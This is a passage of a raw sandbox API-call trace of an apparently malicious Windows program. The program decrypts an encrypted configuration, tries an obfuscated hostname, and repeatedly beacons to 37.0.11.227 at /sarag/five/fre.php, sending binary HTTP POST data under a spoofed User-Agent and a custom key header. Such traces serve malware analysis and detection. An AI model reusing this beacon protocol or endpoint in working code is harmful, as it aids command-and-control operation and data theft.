RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0329.911] GetProcessHeap () returned 0x690000 [0329.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0329.912] send (s=0xb90, buf=0x6ad508*, len=242, flags=0) returned 242 [0329.912] send (s=0xb90, buf=0x6aba40*, len=159, flags=0) returned 159 [0329.912] GetProcessHeap () returned 0x690000 [0329.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0329.912] recv (in: s=0xb90, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0329.989] GetProcessHeap () returned 0x690000 [0329.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0329.990] GetProcessHeap () returned 0x690000 [0329.990] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0329.991] GetProcessHeap () returned 0x690000 [0329.991] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0329.991] GetProcessHeap () returned 0x690000 [0329.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0329.992] closesocket (s=0xb90) returned 0 [0329.992] GetProcessHeap () returned 0x690000 [0329.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0329.992] GetProcessHeap () returned 0x690000 [0329.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0329.993] GetProcessHeap () returned 0x690000 [0329.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0329.993] GetProcessHeap () returned 0x690000 [0329.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0329.994] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18dc) returned 0xb90 [0329.995] Sleep (dwMilliseconds=0xea60) [0329.996] GetProcessHeap () returned 0x690000 [0329.996] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0329.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.997] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0330.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.004] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0330.009] GetProcessHeap () returned 0x690000 [0330.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0330.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.011] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0330.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.012] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0330.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.013] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.013] GetProcessHeap () returned 0x690000 [0330.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0330.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.014] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0330.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.015] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0330.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.016] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0330.016] GetProcessHeap () returned 0x690000 [0330.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0330.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.017] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0330.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.020] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0330.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.021] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0330.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.023] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0330.023] GetProcessHeap () returned 0x690000 [0330.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0330.023] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0330.023] GetProcessHeap () returned 0x690000 [0330.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0330.024] GetProcessHeap () returned 0x690000 [0330.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0330.024] GetProcessHeap () returned 0x690000 [0330.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0330.026] GetProcessHeap () returned 0x690000 [0330.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0330.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.027] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0330.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.032] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0330.037] GetProcessHeap () returned 0x690000 [0330.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0330.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.038] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0330.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.039] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0330.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.040] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.040] GetProcessHeap () returned 0x690000 [0330.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0330.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.041] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0330.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.042] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0330.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.043] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0330.043] GetProcessHeap () returned 0x690000 [0330.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0330.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.044] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0330.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.045] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0330.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.046] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0330.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.047] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0330.047] GetProcessHeap () returned 0x690000 [0330.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0330.047] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0330.047] GetProcessHeap () returned 0x690000 [0330.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0330.047] socket (af=2, type=1, protocol=6) returned 0xb94 [0330.047] connect (s=0xb94, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0330.075] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0330.075] GetProcessHeap () returned 0x690000 [0330.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0330.075] GetProcessHeap () returned 0x690000 [0330.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0330.076] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0330.076] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0330.076] GetProcessHeap () returned 0x690000 [0330.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0330.076] GetProcessHeap () returned 0x690000 [0330.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0330.077] GetProcessHeap () returned 0x690000 [0330.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0330.077] GetProcessHeap () returned 0x690000 [0330.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0330.078] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0330.079] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0330.079] GetProcessHeap () returned 0x690000 [0330.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0330.079] GetProcessHeap () returned 0x690000 [0330.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0330.079] send (s=0xb94, buf=0x6ad508*, len=242, flags=0) returned 242 [0330.080] send (s=0xb94, buf=0x6aba40*, len=159, flags=0) returned 159 [0330.080] GetProcessHeap () returned 0x690000 [0330.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0330.080] recv (in: s=0xb94, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0330.163] GetProcessHeap () returned 0x690000 [0330.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0330.164] GetProcessHeap () returned 0x690000 [0330.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0330.165] GetProcessHeap () returned 0x690000 [0330.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0330.165] GetProcessHeap () returned 0x690000 [0330.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0330.165] closesocket (s=0xb94) returned 0 [0330.166] GetProcessHeap () returned 0x690000 [0330.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0330.166] GetProcessHeap () returned 0x690000 [0330.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0330.167] GetProcessHeap () returned 0x690000 [0330.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0330.167] GetProcessHeap () returned 0x690000 [0330.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0330.173] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18e0) returned 0xb94 [0330.174] Sleep (dwMilliseconds=0xea60) [0330.189] GetProcessHeap () returned 0x690000 [0330.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0330.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.190] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0330.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.268] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0330.354] GetProcessHeap () returned 0x690000 [0330.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0330.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.456] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0330.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.457] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0330.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.458] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.458] GetProcessHeap () returned 0x690000 [0330.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0330.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.460] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0330.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.461] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0330.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.463] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0330.463] GetProcessHeap () returned 0x690000 [0330.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0330.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.466] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0330.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.467] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0330.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.468] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0330.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.472] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0330.472] GetProcessHeap () returned 0x690000 [0330.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0330.472] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0330.473] GetProcessHeap () returned 0x690000 [0330.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0330.473] GetProcessHeap () returned 0x690000 [0330.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0330.474] GetProcessHeap () returned 0x690000 [0330.474] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0330.474] GetProcessHeap () returned 0x690000 [0330.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0330.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.475] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0330.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.481] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0330.492] GetProcessHeap () returned 0x690000 [0330.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0330.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.493] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0330.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.495] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0330.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.498] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.498] GetProcessHeap () returned 0x690000 [0330.499] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0330.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.501] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0330.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.502] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0330.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0330.503] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0330.503] GetProcessHeap () returned 0x690000 [0330.503] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0330.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.504] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0330.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.505] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0330.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.509] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0330.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.510] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0330.510] GetProcessHeap () returned 0x690000 [0330.510] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0330.510] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0330.510] GetProcessHeap () returned 0x690000 [0330.510] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0330.511] socket (af=2, type=1, protocol=6) returned 0xb98 [0330.511] connect (s=0xb98, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0330.543] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0330.543] GetProcessHeap () returned 0x690000 [0330.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0330.543] GetProcessHeap () returned 0x690000 [0330.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0330.544] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0330.546] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0330.546] GetProcessHeap () returned 0x690000 [0330.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0330.546] GetProcessHeap () returned 0x690000 [0330.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0330.547] GetProcessHeap () returned 0x690000 [0330.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0330.547] GetProcessHeap () returned 0x690000 [0330.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0330.597] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0330.598] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0330.598] GetProcessHeap () returned 0x690000 [0330.598] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0330.598] GetProcessHeap () returned 0x690000 [0330.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0330.599] send (s=0xb98, buf=0x6ad508*, len=242, flags=0) returned 242 [0330.599] send (s=0xb98, buf=0x6aba40*, len=159, flags=0) returned 159 [0330.599] GetProcessHeap () returned 0x690000 [0330.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0330.600] recv (in: s=0xb98, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0330.698] GetProcessHeap () returned 0x690000 [0330.698] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0330.699] GetProcessHeap () returned 0x690000 [0330.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0330.700] GetProcessHeap () returned 0x690000 [0330.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0330.700] GetProcessHeap () returned 0x690000 [0330.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0330.701] closesocket 